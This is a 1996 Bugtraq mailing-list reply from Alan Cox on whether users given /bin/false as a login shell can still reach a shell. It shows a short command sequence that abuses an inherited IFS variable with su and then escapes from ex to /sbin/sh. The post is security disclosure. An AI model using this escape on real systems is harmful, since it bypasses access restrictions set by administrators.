[3150] in bugtraq
Re: ? Trojan /usr/bin/false ?
daemon@ATHENA.MIT.EDU (Alan Cox)
Tue Aug 13 20:15:26 1996
Date: Tue, 13 Aug 1996 17:52:15 +0100
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
From: Alan Cox <alan@cableol.net>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
In-Reply-To: <199608130927.LAA00713@visbl.rus.uni-stuttgart.de> from "Bernd
Lehle" at Aug 13, 96 11:27:05 am
> (Besides some silly Copyright and Version Information from AT&T).
> Is there a possibility that through obscure circumstances a user having
> /bin/false or /bin/true as a login shell ends up with /sbin/sh ?
Just about. If your telnetd/rlogind/su propogates IFS then a user
can do
IFS=" i"
export IFS
su
i not found or similar error
:
[they end up in ex]
set shell=/sbin/sh
!sh
